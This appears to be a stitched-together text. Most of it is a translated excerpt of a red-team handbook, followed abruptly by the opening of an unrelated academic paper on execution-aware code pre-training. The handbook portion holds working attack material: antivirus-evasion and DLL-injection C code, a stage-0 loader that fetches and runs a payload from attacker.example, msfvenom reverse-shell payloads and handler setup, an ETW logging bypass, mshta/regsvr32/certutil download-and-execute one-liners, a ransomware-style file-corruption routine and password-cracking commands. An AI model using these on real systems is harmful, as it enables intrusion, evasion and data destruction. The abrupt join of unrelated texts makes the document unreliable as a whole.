#include <string.h>

// Caesar-style string decryption: shift every byte back by a fixed key
// and NUL-terminate the result.
int decrypt(const char* string, char result[]) {
    int key = 6;
    int len = strlen(string);
    for (int n = 0; n < len; n++) {
        int symbol = string[n];
        int e_symbol = symbol - key;  // undo the +key shift applied at encryption time
        result[n] = e_symbol;
    }
    result[len] = '\0';
    return 0;
}

Another way to evade antivirus detection is to call functions in User32.dll through function pointers instead of calling them directly.
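To show what that looks like, here is a minimal sketch (not the book's exact code): it resolves MessageBoxA out of User32.dll at runtime with LoadLibraryA/GetProcAddress, so the call never shows up in the binary's static import table. The function choice and strings are arbitrary placeholders.

#include <windows.h>

// Matches the signature of MessageBoxA so the resolved address is callable.
typedef int (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

int main(void) {
    // Resolve the DLL and function at runtime instead of importing them.
    HMODULE user32 = LoadLibraryA("user32.dll");
    if (!user32) return 1;

    MessageBoxA_t pMessageBoxA =
        (MessageBoxA_t)GetProcAddress(user32, "MessageBoxA");
    if (!pMessageBoxA) return 1;

    pMessageBoxA(NULL, "Called through a function pointer", "demo", MB_OK);
    return 0;
}

In a real payload, the "MessageBoxA" string itself would typically be stored encrypted and recovered with a routine like decrypt() above, so neither the import nor the plaintext string is available for signature matching.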
Another very obvious improvement is to convert the executable into a DLL and inject that DLL into a running process, so it does not show up as its own process in Task Manager. Some utilities can list every DLL currently loaded on a system, so an injected DLL is stealthier but not invisible.
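For reference, here is a minimal sketch of the classic CreateRemoteThread injection technique (the tooling discussed in this chapter uses reflective injection, which avoids LoadLibrary entirely; this simpler variant only illustrates the mechanics). PID and DLL path come from the command line.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Inject a DLL into a running process: write the DLL's path into the
// target's memory, then start a remote thread at LoadLibraryA.
int inject(DWORD pid, const char *dllPath) {
    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!proc) return 1;

    SIZE_T len = strlen(dllPath) + 1;
    LPVOID remote = VirtualAllocEx(proc, NULL, len,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!remote || !WriteProcessMemory(proc, remote, dllPath, len, NULL)) {
        CloseHandle(proc);
        return 1;
    }

    // kernel32.dll loads at the same base in every process, so the local
    // address of LoadLibraryA is valid in the target as well.
    LPTHREAD_START_ROUTINE loadLib = (LPTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    HANDLE th = CreateRemoteThread(proc, NULL, 0, loadLib, remote, 0, NULL);
    if (!th) { CloseHandle(proc); return 1; }

    WaitForSingleObject(th, INFINITE);
    CloseHandle(th);
    CloseHandle(proc);
    return 0;
}

int main(int argc, char **argv) {
    if (argc != 3) { printf("usage: inject <pid> <full dll path>\n"); return 1; }
    return inject((DWORD)atoi(argv[1]), argv[2]);
}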
Table 7.1

Message type | Payload   | Description
0            | shellcode | Sends raw shellcode bytes to the client
1            | DLL       | Sends a normal DLL file; the client reflectively injects the DLL

Although the payload (shellcode/DLL) can come from any command-and-control tool (Metasploit/Meterpreter, Cobalt Strike, and so on), we will use a Meterpreter payload in our examples.

msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=<Your_IP> LPORT=<PORT> EnableStageEncoding=True -f c

Note that you have to take the msfvenom output and reduce it to the raw shellcode (strip the quotes, newlines, and anything else that is not shellcode).

msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=<Your_IP> LPORT=<PORT> EnableStageEncoding=True -f dll > msf.dll

Start the server: ./thpd ./msf.dll 1

7.3.3 The Client

The client runs much like the server, registering a handler for each message type.
7.3.4 Configuring the Client and Server

Most of the client configuration can be found in globals.cpp. The three main settings you will need to change are the hostname, the port, and the packet duration.

7.4 Recompiling Metasploit/Meterpreter to Evade Antivirus and Network Detection

This topic gets somewhat involved, and you will most likely run into some issues during compilation. Highly recommended tools like Metasploit/Meterpreter are signatured by every antivirus and network intrusion detection (NID) product. Any type of obfuscation usually still leaves a root signature that can be discovered and detected: antivirus engines look for specific strings at specific locations in memory, and network devices perform man-in-the-middle inspection of HTTPS traffic.
https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
Visual Studio 2013 (VS2013): the Visual Studio Community edition is fine; make sure the C/C++ build environment is installed. Install LLVM (32-bit) on Windows (after installing Visual Studio, be sure to install the LLVM toolchain): LLVM 6 can be downloaded from the LLVM website.

git clone https://github.com/cyberspacekittens/metasploit-framework
cd metasploit-framework && git submodule init && git submodule update && cd ..
git clone https://github.com/cyberspacekittens/metasploit-payloads
cd metasploit-payloads && git submodule init && git submodule update && cd ..

cd metasploit-framework\external\source\metsvc\src

Compile with make:

"C:\Program Files (x86)\GnuWin32\bin\make.exe"

Move the newly created binaries into the meterpreter folder:

copy metsvc.exe ..\..\..\..\data\meterpreter\
copy metsvc-server.exe ..\..\..\..\data\meterpreter\
copy metasploit-payloads\c\meterpreter\output\x86* metasploit-framework\data\meterpreter
copy metasploit-payloads\c\meterpreter\output\x64* metasploit-framework\data\meterpreter
This is the foundation of everything Metasploit does, and many antivirus solutions carry advanced signatures and heuristic detections aimed specifically at Metasploit's behavior; even if you modify the shellcode and pad it with junk code, it will still get flagged by heuristics. To get around this, we wrote our own Stage 0 that performs the same function (download and execute in memory): it copies the download logic of Meterpreter's reverse_https payload, fetches metsrv.dll from the server, and then stores and executes it in memory.
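The heart of such a stage 0 is only a few Windows API calls. The sketch below shows a bare download-and-execute loop in C over plain HTTP; the stage 0 described above additionally mimics reverse_https's transport and loads metsrv.dll through a reflective loader rather than jumping to raw bytes. The URL and size cap are placeholders.

#include <windows.h>
#include <wininet.h>

#pragma comment(lib, "wininet.lib")

int main(void) {
    // Fetch the payload over HTTP into an executable buffer.
    HINTERNET net = InternetOpenA("Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT,
                                  NULL, NULL, 0);
    HINTERNET url = InternetOpenUrlA(net, "http://attacker.example/stage",
                                     NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);
    if (!url) return 1;

    SIZE_T cap = 4 * 1024 * 1024;  // assume the payload is under 4 MB
    unsigned char *buf = (unsigned char *)VirtualAlloc(
        NULL, cap, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!buf) return 1;

    DWORD total = 0, got = 0;
    while (total + 8192 <= cap &&
           InternetReadFile(url, buf + total, 8192, &got) && got > 0)
        total += got;

    // Run the downloaded bytes in place. This works for position-independent
    // shellcode; a DLL such as metsrv.dll needs a reflective loader instead.
    ((void (*)(void))buf)();
    return 0;
}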
In Visual Studio 2013, open metasploit-payloads\c\x64_defender_bypass\x64_defender_bypass.vcxproj. Under x64_defender_bypass there is a settings.h file.

A tool called SharpShooter incorporates a number of anti-sandboxing techniques, and James Forshaw's DotNetToJScript can be used to execute shellcode from Windows Script formats (see the CACTUSTORCH tool on GitHub).

Open a new terminal and create a C# Meterpreter payload:

msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=10.100.100.9 LPORT=8080 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f csharp

Copy everything between the braces ({ and }) and submit it as the byte array. Provide the URI for the C# web delivery.

Figure 7.2

7.6 Application Whitelisting Bypass

We have already discussed different ways to invoke PowerShell without running powershell.exe, but what if you cannot run your own custom binaries on the Windows system at all?

Figure 7.4

Note: I did see that GreatSCT is under active development on the "develop" branch (see the tree/develop sub-page of the GreatSCT repository on GitHub), which includes an HTTPS Meterpreter and other whitelisting-bypass mechanisms.

Once you have execution rights on the victim's Windows machine, run "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe shellcode.xml", and .NET will start building the shellcode.xml file.
Powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters]
On Windows, download the Invoke-Obfuscation PowerShell files. Load the PowerShell script and start Invoke-Obfuscation:

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Then set the PowerShell script to be obfuscated.

Although antivirus products now commonly flag this kind of behavior, we can use the same idea to create a binary that executes our PowerShell malware directly, without ever running powershell.exe. So I put together a small Python script that takes a PowerShell script and obfuscates all of its strings (it is nowhere near production-grade code, since it has only been tested against a handful of scripts).

This is why it is so important to understand how the underlying defenses work, to write low-level code that interacts directly with the Windows API rather than shelling out to commands, and to think beyond the tooling itself and get creative. We can usually write malware that evades antivirus detection, but even when it slips past the initial defenses, the moment we use a tool like mimikatz (in memory) or move laterally to another host, the alarms go off.
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.100.100.9
set LPORT 443
set AutoRunScript post/windows/manage/priv_migrate
set ExitOnSession false
set EnableStageEncoding true
exploit -j

Run the handler.
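If you save these commands to a resource file, the whole handler comes up in one step when the console starts (the file name here is just an example):

msfconsole -r listener.rc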
gedit /opt/empire_autoload.rc

Add the post-exploitation modules you want to execute:

usemodule situational_awareness/network/powerview/get_user
execute
back
usemodule situational_awareness/network/powerview/get_computer
execute
back

Load the autoload.rc resource file in Empire, as shown in Figure 8.1:

agents
autorun /opt/empire_autoload.rc powershell
autorun show

Figure 8.1

As you can see, when the agent connects back, it automatically runs the get_user and get_computer PowerShell scripts.

8.1.3 Automating Cobalt Strike

One of the main reasons Cobalt Strike is so powerful is Aggressor Script. With Cobalt Strike's Aggressor Script you can not only configure autorun-style scripts but also build very complex attacks.

Now, I do not want to link directly to the torrent, since it contains a great many sensitive usernames (or email addresses) and their associated passwords, but you can search for BreachCompilation.tar.bz2 to find more information.
Speed.Dev.#1.....: 59436.3 MH/s (63.16ms)
Speed.Dev.#2.....: 58038.3 MH/s (64.70ms)
Speed.Dev.#3.....: 59104.4 MH/s (63.55ms)
Speed.Dev.#4.....: 59123.0 MH/s (63.52ms)
Speed.Dev.#5.....: 58899.7 MH/s (63.74ms)
Speed.Dev.#6.....: 59125.8 MH/s (63.51ms)
Speed.Dev.#7.....: 59256.3 MH/s (63.36ms)
Speed.Dev.#8.....: 59064.5 MH/s (63.56ms)
Speed.Dev.#*.....: 472.0 GH/s

For those who cannot afford a big GPU rig, there are other options.

Speed.Dev.#1.....: 79294.4 MH/s (33.81ms)
Speed.Dev.#2.....: 79376.5 MH/s (33.79ms)
Speed.Dev.#3.....: 79135.5 MH/s (33.88ms)
Speed.Dev.#4.....: 79051.6 MH/s (33.84ms)
Speed.Dev.#5.....: 79030.6 MH/s (33.85ms)
Speed.Dev.#6.....: 79395.3 MH/s (33.81ms)
Speed.Dev.#7.....: 79079.5 MH/s (33.83ms)
Speed.Dev.#8.....: 79350.7 MH/s (33.83ms)
Speed.Dev.#*.....: 633.7 GH/s

In total, NTLM cracking here is roughly 34% faster than with the Tesla GPUs.
Using the brute-force attack mode (-a 3) with any letter, number, or special character (?a), crack every password of 7 characters or fewer, incrementing the mask length from 1 through 7.
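Against NTLM hashes (hashcat mode 1000), the full command might look like the following; ntlm.hashes is a placeholder file name:

hashcat -a 3 -m 1000 --increment ntlm.hashes ?a?a?a?a?a?a?a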
The first file (40GB_Unique_File.txt) is a 3.2 GB password file and takes about 9 seconds to run:

[hashcat] ./lists/40GB_Unique_File.txt

As we can see, even the largest file takes only seconds to compute.

[hashcat] ./lists/40GB_Unique_File.txt -r ./rules/rockyou-30000.rule

Note: running the 3 GB file with the NSAKEY rule set took about 7 minutes, while NotSoSecure's "one rule to rule them all" rule set took about 20 minutes. I then repeated the runs with other combinations of password dictionaries and rule sets.

[hashcat] -i -a 6 ./lists/found.2015.txt ?a?a?a?a

It took about 30 minutes to exhaust the four-character appends. We can also prepend characters to the left side of the password list:

[hashcat] -i -a 7 ?a?a?a?a ./lists/40GB_Unique_File.txt

It took about 30 minutes to exhaust the four-character prepends.

hashcat-utils: hashcat ships with a number of utilities that help you build better password dictionaries.

./hashcat-utils-1.8/bin/combinator.bin lists/shortKrak.txt lists/shortKrak.txt > lists/comboshortKrak.txt

Using the list of the top 1,000 Google words produces a dictionary of roughly 1.4 GB, so you have to watch your file sizes.

./hashcat-utils-1.8/bin/combinator.bin lists/google_top_1000.txt lists/google_top_1000.txt > lists/google_top_1000_combo.txt

Feeding combinator a 4 MB input file produced an output file of more than 25 GB.

Brutescrape - https://github.com/cheetz/brutescrape
Burp Word List Extractor - https://portswigger.net/bappstore/21df56baa03d499c8439018fe075d3d7

Next, take all of the cracked passwords, analyze them, and use them to create masks: https://thesprawl.org/projects/pack/
python ./PACK-0.0.4/statsgen.py hashes.password
python ./PACK-0.0.4/statsgen.py hashes.password --minlength=10 -o hashes.masks
python ./PACK-0.0.4/maskgen.py hashes.masks --optindex -q -o custom-optindex.hcmask

Run the password cracker with the newly created masks.
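hashcat accepts the generated .hcmask file directly in brute-force mode; against NTLM hashes (file names as above, for illustration) that would be:

hashcat -a 3 -m 1000 ntlm.hashes custom-optindex.hcmask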
Figure 8.2

cd /opt/pipal
./pipal.rb hashes.password

Looking through the password list, you might discover that the company uses resetme12345 as its default password and that it is probably located in Michigan (Detroit, Tigers, sports references).

We saw this play out in real life with WannaCry, which moved laterally through SMB shares using the EternalBlue exploit, encrypted files, and even deleted all the backups on the host system.

Once the malware executes, it scans the host/network for important files, reads each file into memory, randomly swaps a single byte, and sends those bytes, along with metadata, to the command-and-control server.
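A minimal local sketch of that byte-swap step in C (the network exfiltration is omitted and the file name is a placeholder): it records the offset and original byte, the metadata that would go to the C2 so the file can later be restored, then overwrites that byte in place.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    FILE *f = fopen("important.doc", "r+b");
    if (!f) return 1;

    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    if (size <= 0) { fclose(f); return 1; }

    // Pick a random offset and remember the original byte: this pair is the
    // metadata that would be sent to the C2 for later recovery.
    srand((unsigned)time(NULL));
    long offset = rand() % size;
    fseek(f, offset, SEEK_SET);
    int original = fgetc(f);
    printf("metadata -> offset=%ld original=0x%02x\n", offset, original);

    // Corrupt the file by writing a different byte at that offset.
    fseek(f, offset, SEEK_SET);
    fputc((original + 1) & 0xff, f);

    fclose(f);
    return 0;
}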
The following swaps PowerShell's ETW event provider for a fresh, unregistered one. The $EtwProvider field used on the last line must first be obtained via reflection; the first line below is the standard way to do that and is added here to complete the snippet:

$EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static')
$EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$EtwProvider.SetValue($null, $EventProvider)
8.6 Downloading Files from the Internet with the Windows Command Line

If you gained execution through an application vulnerability, or got a shell via an Office file or PDF, the next step is probably to download and execute your follow-on malware.
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

rundll32.exe javascript:"..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

certutil -urlcache -split -f http://webserver/payload payload

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
8.8 Grabbing NTLM Hashes Without Touching LSASS

Elad Shamir has done extensive research in this area and laid out clearly how to obtain NTLM hashes without touching LSASS.

The pressure is mounting: you need to get inside the company, map out its layout, grab sensitive files and code, move laterally across different users and networks, and ultimately capture Cyber Space Kittens' secret plans.

The beacon on the compromised host comes alive. You start running BloodHound, hunting for local passwords, setting registry keys, scraping LSASS passwords with mimikatz, querying SPNs and dumping all the Kerberos tickets, and, of course, setting up persistence with a scheduled task.

But remember, the point of a red team engagement is to learn how quickly the blue team spots malicious activity (if they spot it at all), and how long it takes them to run incident response/forensics and shut the attack down.

So, to wrap up, you let the blue team know by running the script at https://github.com/EmpireProject/Empire/blob/master/data/module_source/trollsploit/Get-RickAstley.ps1 and shutting the machines down.
Chapter 10 Post-Game Analysis: Reporting

In the previous books in this series, we covered how to write penetration test reports and provided plenty of sample templates. Those templates work well as the standard summary report for a week-long penetration test, but they do not fit a red team campaign. As this book has stressed, the red team's main job is not to identify vulnerabilities as such (although that is usually part of the campaign), but to test employees' security awareness, the tools, the processes, and the staff's skills. If your company were attacked and breached by an exercise crew or by real bad actors, what grade would you give yourself? I have always been opposed to using gap-assessment scores, ISO scores, maturity-model scores, standard risk analyses, heat maps, and similar reporting to portray what a company's security program really looks like.

Personally, before a red team campaign I want to see real progress in the company's defenses. For example, against a phishing campaign that uses a doppelganger-style domain, we would hope to see the company have some of the following in place:

- Alerting on domains that look like the company's own, using DNStwist.
- A list of trusted external email domains. Any external mail that does not match gets a header appended, visible to the end user, indicating that the mail comes from outside the company and is not an approved email source. This helps your users spot phishing attempts more easily.
- If any link in an email points to a domain uncategorized by the proxy, at minimum warn the user on click that the domain is uncategorized.
- Office macros and attachments disabled, with Protected View and sandboxing enforced.

These are just a few simple measures a company can implement that effectively disrupt attacks.

Remember, the red team only needs to find one security gap that can compromise the environment. The blue team, meanwhile, only needs to identify one element of the attacker's tactics, techniques, and procedures to prevent the network from being breached. So the question becomes: if your tooling spots one element of the attacker's activity and raises an alert, how long does it take your incident response team to notice and respond?

So what goes into a red team report? Red teaming is still a young field, there is no standard report template yet, and we can tailor the report to the customer's needs. From my perspective, since we may try to get into an environment multiple times over the course of a campaign (and get "caught" a few times), we want to show both the good and the bad.

As for what to record during the campaign, many tools (such as Empire and Cobalt Strike) keep detailed event logs during an operation, but those are far from enough. Something that works very well is to stand up a simple web server and log every action each red team member performs. During the campaign, collect only the essentials: the specific event, the server, a description, the impact, any alerts, and screenshots. Most red teamers/pentesters hate taking notes, and the web server gives you a lightweight way to track the operation, as shown in Figure 10.1.

After the campaign, we gather all the records and assemble them into the red team report that tells the story. The main sections of a red team report might include the following.

Introduction/Scope: this section must clearly state the goals of the campaign. For example, the customer asked us to obtain specific data, such as domain admin, personally identifiable information, and IP addresses, or to capture a flag on a production web server.

Tip: a post-engagement review with the incident response/forensics team is extremely valuable. We need to identify where tools or sensors may have been missing, making it impossible to perform forensics or detect the malicious activity. To that end, we want to hand over the IP addresses of our command-and-control servers, the domains we used, the MD5/SHA1 hashes of our binaries, email addresses and IP information, the list of phished targets, and anything else that can help the incident response/forensics team do their work.

Figure 10.1

Attack timeline: this is one of the most important parts of a red team campaign and deserves thorough documentation. The timeline should fully describe all major events, the detection times for triggered alerts, and the major operational steps. It lets the blue team compare the timeline against their own logs and see where the gaps are. In a real attack, could you ask the attacker for everything they did? This is enormously helpful to the defending blue team. A sample timeline might look like Figure 10.2.

Figure 10.2

Time To Detect (TTD) / Time To Mitigate (TTM): we can often pull the TTD/TTM statistics from the blue team's reporting. In short, we want to know how long the blue team took to discover each intrusion; how much time passed before the scanning event triggered an investigation (if it ever did); and how long it took the blue team to discover the phishing campaign. The second part should cover the time-to-action statistics. Once command-and-control traffic or a phishing attack has been identified, how long does it take for the firewall or DNS server to block that domain? We often see companies that are good at blocking domain names but unable to block a command-and-control server communicating by IP address (or vice versa). We want to track these events and identify them for the customer. Another important TTM measure is whether they can quickly isolate systems confirmed to be compromised. As malware becomes increasingly automated, we need to start using intelligent, automated processes to cut a system or a network segment off from the rest of the organization.

Feedback from the incident response/forensics team: I like to record the blue team's feedback, that is, how the whole campaign looked from the defender's point of view. I want to know whether the blue team followed its documented procedures, whether an incident lead ran the investigation, whether management got deeply involved, how security interacted with IT to drive changes (firewall blocks, DNS modifications, and so on), and who panicked versus who stayed calm.

As stated before, the point of the red team is not to find vulnerabilities or break the environment (although that is the fun part); the point of the red team is to improve the organization's overall security processes and to demonstrate the gaps in its security posture. Many companies today are overconfident in their security processes and will not change until they are breached. Through red teaming, we can simulate the attack and push for change, so that a real breach never has to happen.
Chapter 11 Continuing Education

A question I am always asked: "What do I do now? I have read all of The Hacker Playbook books, taken all sorts of training courses, and attended plenty of conferences!" The best advice I can give right now is to start with small projects and contribute to the security community. It is a great way to truly test your skills.

Here are some ideas that may be useful.

Set up a blog and your own GitHub account: you should write down everything you experience and learn, and share it with others; it genuinely helps you grow. Documenting what you learn on a blog improves your writing, forces you to explain vulnerabilities/exploits in a more digestible way, and makes sure you understand the material deeply enough to explain it to someone else.

Your resume should be your GitHub account: I always tell my students that your GitHub account (or blog) should stand on its own. Whether it is small security projects, such as making tools faster and more effective, or your own security projects, your work should be showcased on GitHub.

Speak at local meetups: speaking can be intimidating, but with speaking experience on your resume you will have a much easier time breaking into the security field. Where do you find speaking opportunities? I recommend starting with local meetups and finding groups you can get involved with. They are usually small, and everyone is very friendly. If you are in Southern California, I founded and run LETHAL, a free, community-driven security group whose members meet once a month. Whatever you do, get involved!

Bug bounties: whether you are on offense or defense, bounty programs can really sharpen your skills. Bug bounty programs such as HackerOne, BugCrowd, and SynAck are free to sign up for. Not only can you earn money legitimately, you can also legally hack target sites (within the program scope, of course).

Capture The Flag competitions: I know it is hard to find time for all of this, but I always tell my students: security is not a job, it is a lifestyle. Visit CTFtime.org, pick some CTF competitions, set those weekends aside, and start hacking. Trust me, you will learn more over a CTF weekend than in any course.

Build a lab with your friends: simulate a corporate environment in a test lab; without one it is hard to operate in real-world scenarios. Without that environment, you will never really understand what is happening under the hood when you run your offensive tools. So build a comprehensive lab with VLANs, Active Directory, servers, GPOs, users and computers, Linux environments, Puppet, Jenkins, and all the other common tools you are likely to encounter.

Learn from the adversary: for red teams this is a crucial factor. Our campaigns should not be theoretical; they should replicate real attacks. Keep a close eye on the latest APT reports and make sure you understand how adversaries are changing their tradecraft.

Follow The Hacker Playbook series: for the latest Hacker Playbook news, subscribe at thehackerplaybook.

Training: if you are looking for training, visit the thehackerplaybook website.

Acknowledgments

Book contributors: Walter Pearce, Kristen Kim, Bill Eyler, Ann Le, Michael Lim, Kevin Bang, Brett Buerhaus, Tony Dow, Tom Gadola

Special thanks: Mark Adams, Tim Medin (nidem), SpecterOps, Gianni Amato, Casey Smith (@subTee), Robert David Graham, Ben Ten (@Ben0xA), blechschmidt, Vincent Yiu (@vysecurity), Jamieson O'Reilly, Chris Spehn (@ConsciousHacker), Nikhil Mittal (SamratAshok), Barrett Adams (peewpw), Michael (codingo), Daniel Bohannon (@danielbohannon), Cn33liz, Swissky (Swisskyrepo), Sean Metcalf (@PyroTek3), Robin Wood (digininja), @harmj0y, TrustedSec, Matt Graeber (@mattifestation), David Kennedy (@HackingDave), Matt Nelson (@enigma0x3), FireEye, Ruben Boonen (@FuzzySec), Igandx, Ben Campbell (@Meatballs), Alexander Innes (leostat), Andrew Robbins (@_wald0), ActiveBreach (mdsecactivebreach), Raphael Mudge (@rsmudge), bbb31, Daniel Miessler (@DanielMiessler), pentestgeek, Gianni Amato (guelfoweb), SECFORCE, Ahmed Aboul-Ela (aboul3la), Steve Micallef, Lee Baird (leebaird), SpiderLabs, Dylan Ayrey (dxa4481), H.D. Moore, Rapid7 (@rapid7), TheRook, Will Schroeder (@harmj0y), Ron Bowes (@iagox86), Emilio (epinna), SensePost, Sekirkity, George Chatzisofroniou (sophron), Byt3bl33d3r, Derv (derv82), Karim Shoair (D4Vinci), Garrett Gee, Chris Truncer, HackerWarehouse, Anshuman Bhartiya, LETHAL, OJ Reeves, n00py, Ben Sadeghipour (@nahamsec)
2306.07487

TRACED: Execution-aware Pre-training for Source Code

Yangruibo Ding (Columbia University, New York, NY, USA), Ben Steenhoek (Iowa State University, Ames, IA, USA), Kexin Pei (Columbia University, New York, NY, USA), Gail Kaiser (Columbia University, New York, NY, USA), Wei Le (Iowa State University, Ames, IA, USA), Baishakhi Ray (Columbia University, New York, NY, USA)

ABSTRACT

Most existing pre-trained language models for source code focus on learning the static code text, typically augmented with static code structures (abstract syntax tree, dependency graphs, etc.). However, program semantics will not be fully exposed before the real execution. Without an understanding of the program execution, statically pre-trained models fail to comprehensively capture the dynamic code properties, such as the branch coverage and the runtime variable values, and they are consequently less effective at code understanding tasks, such as retrieving semantic clones and detecting software vulnerabilities.

To close the gap between the static nature of language models and the dynamic characteristics of programs, we introduce TRACED, an execution-aware pre-training strategy for source code. Specifically, we pre-train code language models with a combination of source code, executable inputs, and corresponding execution traces. Our goal is to teach code models the complicated execution logic during the pre-training, enabling the model to statically estimate the dynamic code properties without repeatedly executing code during task-specific fine-tuning.

To illustrate the effectiveness of our proposed approach, we fine-tune and evaluate TRACED on three downstream tasks: static execution estimation, clone retrieval, and vulnerability detection. The empirical results show that TRACED relatively improves the statically pre-trained code models by 12.4% for complete execution path prediction and by 25.2% for runtime variable value predictions. TRACED also significantly outperforms statically pre-trained models in clone retrieval and vulnerability detection across four public benchmarks.

1 INTRODUCTION

Machine Learning (ML) for source code has enabled many software engineering tasks, such as automated program repair [11, 21-23], bug finding [8, 54], and refactoring [7]. Recently, the common practice of training ML models for source code understanding is based on pre-training a Transformer-based language model on source code. These approaches treat source code programs as static text [1, 6, 16, 49], sometimes augmented with program-specific structures such as abstract syntax trees and dependency graphs [10, 17, 18, 35], and adapt pre-training strategies for natural language to learn program representations.

However, many source code understanding tasks require a more comprehensive understanding of program behavior. For instance, detecting semantic clones [32] involves determining whether two pieces of code behave similarly under similar inputs, even if their structures are apparently different. Likewise, detecting vulnerabilities often requires developers to analyze whether a potentially problematic location can be executed and what kinds of value flows can expose any vulnerability. While existing code models are primarily trained to capture static code properties, they are not effective at reasoning about program behavior. In fact, many of the deeper program semantics only manifest when the code is executed. As a result, these models tend to underperform on tasks that require deeper semantic understanding.

Figure 1: A motivating example from CodeNet's coding challenge No. 3597 [41] reveals that statically pre-trained code language models, regardless of their size, could not reason about the branch coverage given a specific input, while TRACED, enhanced with program execution features, correctly identifies the execution path.

Motivating Examples. Figure 1 presents an example with simple execution logic to illustrate the failure of statically pre-trained code models on branch coverage prediction. We query three pre-trained code models, CodeX [13] (code-davinci-002), UnixCoder [17], and TRACED (ours), to predict the branch coverage according to the given program inputs. For CodeX, we prompt the model with carefully designed questions, similar to [36], to ask for the branch coverage prediction in the zero-shot setting. Specifically, we augment the prompts by adding comments at the end of lines 12 and 16: // Will this line be executed? Yes or no?. To give more hints regarding the data flow, we further add a comment at the end of line 10: // A is -1, since it accepts the second value of the input. Unfortunately, even when provided with additional hints about the data flow required for branch prediction, CodeX still failed to predict the correct coverage labels, suggesting it cannot interpret this simple execution.

Besides the zero-shot prompting, we also study whether fine-tuning pre-trained code models to predict execution can lead to better branch prediction. Specifically, we fine-tune another popular pre-trained code model, UnixCoder [17], to predict branch execution while ensuring the motivating example is not seen during training. From the inference results in Figure 1, we notice that UnixCoder cannot predict covered branches even after being fine-tuned. It predicts that neither of the branches will be covered, indicating that it does not have the basic understanding that, for this specific example, at least one branch will always be taken on a valid input.

Our approach. To address the limitation of the statically pre-trained code models, we propose TRACED, an execution-aware pre-training strategy to capture the static and dynamic perspectives of the source code. Specifically, we pre-train the Transformer-based language model with multi-task objectives on predicting source code, program states, and execution coverage, forcing the model to reason about both the program's runtime behavior and the naturalness of the source code [43] at the same time. We address several technical challenges, such as representing program execution states, encoding the runtime variable values, and representing code coverage, to implement the pre-training strategy.

Representing Program States. During program execution, variables are used to store data that is used by the program. These variables can have different types, such as integers, floating-point numbers, pointers, and arrays. As the program executes, the values of these variables change, reflecting the changes in the program's state. Consequently, software developers typically monitor the variable values, via debugging tools, to observe the execution facts [52] and understand the dynamic behaviors of the program. In this work, we define the program state at a specific time step of the execution as the set of values of every defined variable in the current scope. In other words, the program state is equivalent to the value mapping table of the debugger, which the developer monitors when the program is paused at a specific breakpoint.

Value Quantization. While the runtime variable values are traced as concrete values, directly learning them brings challenges to machine learning models. Concrete values span a wide range of possible values, especially when considering different data types (integers, floating-point numbers, arrays, pointers, etc.), leading to a high-dimensional, complex, but sparse data distribution. This increased data complexity and sparsity makes it hard for the model to learn patterns and relationships between the variable values, as it must deal with many unique inputs, which causes the model to overfit and memorize specific instances rather than generalize to broader patterns. Additionally, noise, outliers, and irregularities of concrete values also mislead the model's learning process. We empirically demonstrate these limitations in Section 6.3. To decrease the data complexity and increase the density, we define thirty value categories, covering a wide range of variable types, to map the continuous but sparse variable values into discrete bins. We call this process value quantization, similar in design to quantization in signal processing (https://en.wikipedia.org/wiki/Quantization_(signal_processing)). This simplification potentially helps the model to be more resilient to noise and outliers, allowing it to focus on learning the underlying execution patterns and relationships between variables rather than being sensitive to specific instances or irregularities.

Representing Execution Coverage. While program state labels provide important information about the current state of the program, they do not capture how the program arrived at that state. To boost the training with more comprehensive execution features, besides the variable values we also log the execution coverage, in terms of which lines are executed and which are not, and construct execution coverage features for the model to learn.

Results. We fine-tune and evaluate TRACED's performance on three tasks: static execution estimation, clone retrieval, and vulnerability detection. On statically predicting program executions, TRACED substantially improves the statically pre-trained code models by 12.4% for execution path prediction and by 25.2% for runtime variable value predictions. TRACED also obtains state-of-the-art results in code understanding tasks: TRACED reports 91.2% MAP@R on CodeXGLUE-POJ104 [32], 50.4% F1 on ReVeal [8], and 65.9% accuracy on CodeXGLUE-defect-detection [32].

Contributions. We make the following contributions:

- We present a simplified and compact representation of program executions, including the program states and the execution coverage, to effectively guide code models to learn program semantics and reason about program behavior.
- We propose a novel multi-task pre-training strategy to jointly learn the static and dynamic code properties. As a result, a model pre-trained with our approach is empowered with a decent execution awareness.
- We pre-train TRACED with the proposed trace representation and the execution-aware strategy and evaluate its performance on several downstream tasks. The experimental results demonstrate that TRACED significantly outperforms the statically pre-trained code models on these tasks.
